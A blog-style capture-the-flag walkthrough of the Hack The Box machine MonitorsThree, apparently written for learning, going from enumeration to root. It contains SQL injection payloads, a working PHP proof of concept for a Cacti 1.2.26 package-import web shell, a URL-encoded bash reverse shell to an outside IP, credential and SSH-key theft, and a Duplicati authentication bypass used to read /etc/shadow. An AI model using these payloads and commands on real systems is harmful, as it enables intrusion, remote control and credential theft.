MonitorsThree HTB writeup

Walkethrough for the MonitorsThree HTB machine.

Posted by xtromera on August 30, 2024 · 16 mins read

Report

Doing the usual port scanning


1

We get the usual 22 ssh, 80 http but here we get a weird 8084 filtered port, we will put that for later.
Checking port 80 we get a redirection


2
Adding it to /etc/hosts
Having a domain, means that the machine can host another subdomain or a Vhost.
Doing Vhost fuzzing using gobuster

gobuster vhost -u="http://monitorsthree.htb" -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

We get a hit


3
Added to the /etc/hosts file.
Doing a directory fuzzing in the background while checking the website.

gobuster dir -u=http://monitorsthree.htb -w=/usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x txt,php,zip,html,db

Index page got nothing interesting but a single button (going with low hanging fruits) and of course source code has nothing interesting.
4
Checking the login button.
5
Trying default credentials led to nothing.
We have 2 interesting pages a login and a forgot password

6
Checking the directory fuzzing, we get nothing really special but admin that we can check later

7
Firing up burpsuite to intercept the 2 requests and passing them to sqlmap to automate the job

8
Opening burpsuite, get to the proxy tab and open the intercept
his is the request of the login

9
And here is the request of the forgot_password

10
Copying them and saving them into 2 separates files

11
Passing them to sqlmap in parallels to automate and speed things up

sqlmap -r reqLogin --batch --risk=3 --level=3

Same for the reqRecover

sqlmap -r reqRecover --batch --risk=3 --level=3

Trying at that time to manually do some sql injection payloads to speed things up.
Chose to begin with the forgot_password page.
Testing for a lot of injection payloads we always get the same error


12

Till we get something strange trying this payload 'sd -- -


13
Now we know how to inject new queries, by adding the prefix ' and the suffix -- - but URL encoded of course from burspuite’s repeater.
Trying the famous 1=1 payload tr'OR+1=1+--+-+

14
Very weird…
Trying to reveal the number of columns using the order by method tr'+ORDER+BY+20+--+-+

15

Trying to go lower till we reach this tr'+ORDER+BY+9+--+-+


16

Seems that this payload worked but it actually doesn’t display anything.
From this we can conclude that this is a blind error based or time based SQL injection with a prefix of ' and a suffix of -- - and the vulnerable page is the forgot_password page.
Knowing that we can proceed with sqlmap, stop the 2 processes and give sqlmap some hints to speed things up a little bit

sqlmap -r req2  --batch --prefix="'" --suffix="-- -" --dbs  --technique=BEU

And we get a hitt!! we discover the database monitorsthree_db and ending up (after very very long time due to poor connection) extracting those findings.


17

Cracking the hash and we end up with the credentials admin:greencacti2001
Trying to login with those credentials to our admin panel
18
We logged in as admin but it led us to nowhere.
Time to check for our other Vhost cacti

19

cacti application found with a version 1.2.26
A small search, a vulnerability was found this link explains the exploitation
Using this exploit here

<?php

$xmldata = "<xml>
   <files>
       <file>
           <name>resource/test.php</name>
           <data>%s</data>
           <filesignature>%s</filesignature>
       </file>
   </files>
   <publickey>%s</publickey>
   <signature></signature>
</xml>";
$filedata = "<?php phpinfo(); ?>";
$keypair = openssl_pkey_new(); 
$public_key = openssl_pkey_get_details($keypair)["key"]; 
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");

?>

Changing the filedata variable to be

<?php system(\$_GET['cmd']); ?>

Run the POC

php poc.php

A zip file was generated
20
Logging in to the cacti dashboard using the same credentials
21
Following the POC, going to Import/Export > Import Package
22
Select the test.xml.gz file and import it
23
Follow the path given /var/www/html/cacti/resource/test.php
24
We get RCE
Using the revshells.com payload and URL encode it, open a NC listener, we get a connection

http://cacti.monitorsthree.htb/cacti/resource/test.php?cmd=bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.66%2F4444%200%3E%261%27


25
Upgrading the shell
26
Searching for Database credentials, we get a hit /var/www/html/cacti/lib/installer.php using linpeas.sh
27
Logging in with those credentials

www-data@monitorsthree:~/html/cacti$ mysql -u cactiuser -pcactiuser

Issuing the command show databases;
28
Then use cacti; and issuing show tables;
29
We can see an interesting table user_auth
Issuing the command SELECT * FROM user_auth;
30
Found the password hash of the user marcus which we disclosed being a user on the machine with the cat /etc/passwd command
31
Cracking the hash using hashcat we get the password in clear text
32
As SSH was open, we try to SSH but we get a public key error
33
This error mean that the machine does not support logging in using username:password
Logging in within our reverse shell and grabbing the private ssh key of the marcus user
34
Copying the key and ssh using the key from our local machine

35
The machine has a docker container
36
This explains the filtered port we found on the port scanning step
Looking at the internal open ports
37
The high ports are more signs of a docker running.
Performing Local Port Forwarding using ssh

ssh -L 8200:127.0.0.1:8200 marcus@monitorsthree.htb -i id_rsa

Checking the new service running on localhost:8200
38
Duplicati service found running. A famous service for backup and storage solution.
A quick search, a vulnerability was found here

Following the explanation, we can find the database files
39
Downloading the files to our local machine and analyzing them, checking the Duplicati-server.sqlite database
40
Checking the Option tables
41
We found the server-passphrase the blog was referencing to.
Getting to the duplicati platform, we give an arbitrary value for the password and intercept the request with burpsuite
42
Writing down the session-nonce then open the console from the inspect
43
Writing down the payload

var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);

The saltedpwd is the server-passphrase but decoding it from base64 and then applying HEX encoding
44
Applying the payload, we get a base64 password
45
Do not forget to URL decode the nonce taken from the request.
Paste the password into the password field and URL encode it. Forward the request
46
We bypassed the login page and authenticated
Now to be able to escalate privileges, and read the root files, we can do the following

  1. Add a new backup and configure a new backup


47

  1. Give it a name and remove encryption


48

  1. make the destination to be /source/tmp as the local device is mounted in the source folder in this docker image


49

  1. For the source data add the /source/etc/shadow to the path and select it


50

  1. Remove the auto backup


51

  1. save it


52

  1. Run the backup then click on restore and select the backup just created


53

  1. Select the target file Shadow


54

  1. Chose the target path to restore it to, here /source/tmp


55

  1. Restore it and check the /tmp/shadow file


56

The machine was pawned successfully
57

← Previous Post Next Post